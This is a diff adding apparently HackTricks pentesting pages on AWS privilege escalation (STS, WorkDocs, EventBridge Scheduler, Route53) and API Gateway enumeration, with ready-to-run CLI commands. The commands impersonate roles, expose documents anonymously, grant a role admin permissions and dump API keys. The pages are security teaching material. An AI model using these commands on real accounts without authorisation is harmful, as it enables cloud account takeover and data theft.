+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## STS
+
+### `sts:AssumeRole`
+
+Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**).
+
+For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role.
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": "sts:AssumeRole"
+        }
+    ]
+}
+```
+
+You can impersonate a role running:
+
+```bash
+aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname
+```
+
+**Potential Impact:** Privesc to the role.
+
+{% hint style="danger" %}
+Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\
+With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role.
+{% endhint %}
+
+### **`sts:GetFederationToken`**
+
+With this permission it's possible to generate credentials to impersonate any user:
+
+```bash
+aws sts get-federation-token --name <username>
+```
+
+This is how this permission can be given securely without giving access to impersonate other users:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "VisualEditor0",
+            "Effect": "Allow",
+            "Action": "sts:GetFederationToken",
+            "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}"
+        }
+    ]
+}
+```
+
+### `sts:AssumeRoleWithSAML`
+
+A trust policy with this role grants **users authenticated via SAML access to impersonate the role.**
+
+An example of a trust policy with this permission is:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "OneLogin",
+            "Effect": "Allow",
+            "Principal": {
+                "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin"
+            },
+            "Action": "sts:AssumeRoleWithSAML",
+            "Condition": {
+                "StringEquals": {
+                    "SAML:aud": "https://signin.aws.amazon.com/saml"
+                }
+            }
+        }
+    ]
+}
+```
+
+To generate credentials to impersonate the role in general you could use something like:
+
+```bash
+aws sts  assume-role-with-saml --role-arn <value> --principal-arn <value>
+```
+
+But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
+
+{% code overflow="wrap" %}
+```bash
+onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
+```
+{% endcode %}
+
+**Potential Impact:** Privesc to the role.
+
+### `sts:AssumeRoleWithWebIdentity`
+
+This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
+
+For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like:
+
+{% code overflow="wrap" %}
+```bash
+aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/<role_name> --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
+# The role name can be found in the metadata of the configuration of the pod
+```
+{% endcode %}
+
+### Federation Abuse
+
+{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %}
+[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
new file mode 100644
index 0000000000..56e02e6001
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
@@ -0,0 +1,52 @@
+# AWS - WorkDocs Privesc
+
+## WorkDocs
+
+For more info about WorkDocs check:
+
+{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %}
+[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md)
+{% endcontent-ref %}
+
+### `workdocs:CreateUser`
+
+Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD:
+
+```bash
+# Create user (created inside the AD)
+aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
+```
+
+### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)`
+
+The files might contain sensitive information, read them:
+
+```bash
+# Get what was created in the directory
+aws workdocs describe-activities --organization-id <directory-id>
+
+# Get what each user has created
+aws workdocs describe-activities --user-id "S-1-5-21-377..."
+
+# Get file (a url to access with the content will be retreived)
+aws workdocs get-document --document-id <doc-id>
+```
+
+### `workdocs:AddResourcePermissions`
+
+If you don't have access to read something, you can just grant it
+
+```bash
+# Add permission so anyway can see the file
+aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
+## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
+```
+
+### `workdocs:AddUserToGroup`
+
+You can make a user admin by setting it in the group ZOCALO\_ADMIN.\
+For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage\_set\_admin.html)
+
+Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin`
+
+I didn't find any way to do this from the cli.
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
new file mode 100644
index 0000000000..9173fadf5c
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -0,0 +1,75 @@
+# AWS - EventBridge Scheduler Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EventBridge Scheduler
+
+More info EventBridge Scheduler in:
+
+{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %}
+[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)
+
+An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action
+
+For example, they could configure the schedule to **invoke a Lambda function** which is a templated action:
+
+```bash
+aws scheduler create-schedule \
+    --name MyLambdaSchedule \
+    --schedule-expression "rate(5 minutes)" \
+    --flexible-time-window "Mode=OFF" \
+    --target '{
+        "Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
+        "RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
+    }'
+```
+
+In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy:
+
+```bash
+aws scheduler create-schedule \                                           
+    --name GrantAdminToTargetRoleSchedule \
+    --schedule-expression "rate(5 minutes)" \
+    --flexible-time-window "Mode=OFF" \
+    --target '{               
+        "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
+        "RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
+        "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"                
+    }'
+```
+
+## References
+
+* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html)
+* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
new file mode 100644
index 0000000000..4a13f8e5c1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md
@@ -0,0 +1,59 @@
+# AWS - Route53 Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+For more information about Route53 check:
+
+{% content-ref url="../aws-services/aws-route53-enum.md" %}
+[aws-route53-enum.md](../aws-services/aws-route53-enum.md)
+{% endcontent-ref %}
+
+### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate`
+
+{% hint style="info" %}
+To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic.
+{% endhint %}
+
+Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs`
+
+Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions.
+
+This is possible because:
+
+* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning)
+* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names
+* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names
+
+**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+
+#### Exploitation <a href="#discovery" id="discovery"></a>
+
+Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md
new file mode 100644
index 0000000000..67243cb537
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/README.md
@@ -0,0 +1,57 @@
+# AWS - Services
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Types of services
+
+### Container services
+
+Services that fall under container services have the following characteristics:
+
+* The service itself runs on **separate infrastructure instances**, such as EC2.
+* **AWS** is responsible for **managing the operating system and the platform**.
+* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
+* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
+* Also, platform-level identity and access management where it exists.
+* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
+
+### Abstract Services
+
+* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
+* The services are accessed via endpoints using AWS application programming interfaces, APIs.
+* The **underlying infrastructure, operating system, and platform is managed by AWS**.
+* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
+* **Data is isolated via security mechanisms**.
+* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
+
+## Services Enumeration
+
+**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
new file mode 100644
index 0000000000..6a7b8d82f0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -0,0 +1,323 @@
+# AWS - API Gateway Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## API Gateway
+
+### Basic Information
+
+AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application.
+
+API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications.
+
+### API Gateways Types
+
+* **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends.
+* **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services.
+* **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services.
+* **REST API Private**: Create a REST API that is only accessible from within a VPC.
+
+### API Gateway Main Components
+
+1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}.
+2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage.
+   * The stage is indicated at the beggining of the URL of the API Gateway endpoint.
+3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**.
+4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API.
+   * In order to make effect the API needs to be **deployed again after** the resource policy is modified.
+
+### Logging
+
+By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**.
+
+### Enumeration
+
+{% hint style="success" %}
+Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.**
+{% endhint %}
+
+{% tabs %}
+{% tab title="apigateway" %}
+```bash
+# Generic info
+aws apigateway get-account
+aws apigateway get-domain-names
+aws apigateway get-usage-plans
+aws apigateway get-vpc-links
+aws apigateway get-client-certificates
+
+# Enumerate APIs
+aws apigateway get-rest-apis # This will also show the resource policy (if any)
+## Get stages
+aws apigateway get-stages --rest-api-id <id>
+## Get resources
+aws apigateway get-resources --rest-api-id <id>
+## Get API resource action per HTTP verb (check authorizers and api key required)
+aws apigateway get-method --http-method GET --rest-api-id <api-id> --resource-id <resource-id>
+
+## Call API
+https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
+## API authorizers
+aws apigateway get-authorizers --rest-api-id <id>
+## Models
+aws apigateway get-models --rest-api-id <id>
+## More info
+aws apigateway get-gateway-responses --rest-api-id <id>
+aws apigateway get-request-validators --rest-api-id <id>
+aws apigateway get-deployments --rest-api-id <id>
+
+# Get api keys generated
+aws apigateway get-api-keys --include-value
+aws apigateway get-api-key --api-key <id> --include-value # Get just 1
+## Example use API key
+curl -X GET -H "x-api-key: AJE&Ygenu4[..]" https://e83uuftdi8.execute-api.us-east-1.amazonaws.com/dev/test
+## Usage plans
+aws apigateway get-usage-plans #Get limit use info
+aws apigateway get-usage-plan-keys --usage-plan-id <plan_id> #Get clear text values of api keys
+aws apigateway get-usage-plan-key --usage-plan-id <plan_id> --key-id <key_id>
+###Already consumed
+aws apigateway get-usage --usage-plan-id <plan_id> --start-date 2023-07-01 --end-date 2023-07-12
+```
+{% endtab %}
+
+{% tab title="apigatewayv2" %}
+```bash
+# Generic info
+aws apigatewayv2 get-domain-names
+aws apigatewayv2 get-domain-name --domain-name <name>
+aws apigatewayv2 get-vpc-links
+
+# Enumerate APIs
+aws apigatewayv2 get-apis # This will also show the resource policy (if any)
+aws apigatewayv2 get-api --api-id <id>
+
+## Get all the info from an api at once
+aws apigatewayv2 export-api --api-id <id> --output-type YAML --specification OAS30 /tmp/api.yaml
+
+## Get stages
+aws apigatewayv2 get-stages --api-id <id>
+
+## Get routes
+aws apigatewayv2 get-routes --api-id <id>
+aws apigatewayv2 get-route --api-id <id> --route-id <route-id>
+
+## Get deployments
+aws apigatewayv2 get-deployments --api-id <id>
+aws apigatewayv2 get-deployment --api-id <id> --deployment-id <dep-id>
+
+## Get integrations
+aws apigatewayv2 get-integrations --api-id <id>
+
+## Get authorizers
+aws apigatewayv2 get-authorizers --api-id <id>
+aws apigatewayv2 get-authorizer --api-id <id> --authorizer-id <uth-id>
+
+## Get domain mappings
+aws apigatewayv2 get-api-mappings --api-id <id> --domain-name <dom-name>
+aws apigatewayv2 get-api-mapping --api-id <id> --api-mapping-id <map-id> --domain-name <dom-name>
+
+## Get models
+aws apigatewayv2 get-models --api-id <id>
+
+## Call API
+https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
+```
+{% endtab %}
+{% endtabs %}
+
+## Different Authorizations to access API Gateway endpoints
+
+### Resource Policy
+
+It's possible to use resource policies to define who could call the API endpoints.\
+In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET.
+
+<figure><img src="../../../.gitbook/assets/image (256).png" alt=""><figcaption></figcaption></figure>
+
+### IAM Authorizer
+
+It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it.
+
+<figure><img src="https://lh3.googleusercontent.com/GGx-kfqNXu6zMqGidnO8_eR88fYPpJG-wNuBBnedAJntiRUEPTEScl7OvWthGYRiI_msYCdC6oBFvJc827Tb4-4UogxpOyrEXyst-8IDzP9DC2NOtXSY7w58L0baCAcBQjSyvBhJREvWWCtiboNYPSKuEw=s2048" alt=""><figcaption></figcaption></figure>
+
+When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization.
+
+One easy way to generate the expected token by the application is to use **curl**.
+
+```bash
+$ curl -X <method> https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource> --user <AWS_ACCESS_KEY>:<AWS_SECRET_KEY> --aws-sigv4 "aws:amz:<region>:execute-api"
+```
+
+Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**.
+
+<figure><img src="../../../.gitbook/assets/image (168).png" alt=""><figcaption></figcaption></figure>
+
+Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint.
+
+Both methods will generate an **Authorization** **header** such as:
+
+```
+AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2
+```
+
+Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**.
+
+### Request Signing Using Python
+
+```python
+
+pip install requests
+pip install requests-aws4auth
+pip install boto3
+
+import boto3
+import requests
+from requests_aws4auth import AWS4Auth
+
+region = 'us-east-1'  # Region
+service = 'execute-api'
+access_key = 'YOUR_ACCESS_KEY'
+secret_key = 'YOUR_SECRET_KEY'
+
+url = 'https://<apiid>.execute-api.us-east-1.amazonaws.com/<stage>/<resource>'
+
+session = boto3.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key)
+credentials = session.get_credentials()
+awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)
+
+response = requests.get(url, auth=awsauth)
+
+print(response.text)
+
+```
+
+### Custom Lambda Authorizer
+
+It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\
+You can set each resource method that will be using the authoriser.
+
+<details>
+
+<summary>Lambda Authorizer Code Example</summary>
+
+```python
+import json
+
+def lambda_handler(event, context):
+    token = event['authorizationToken']
+    method_arn = event['methodArn']
+
+    if not token:
+        return {
+            'statusCode': 401,
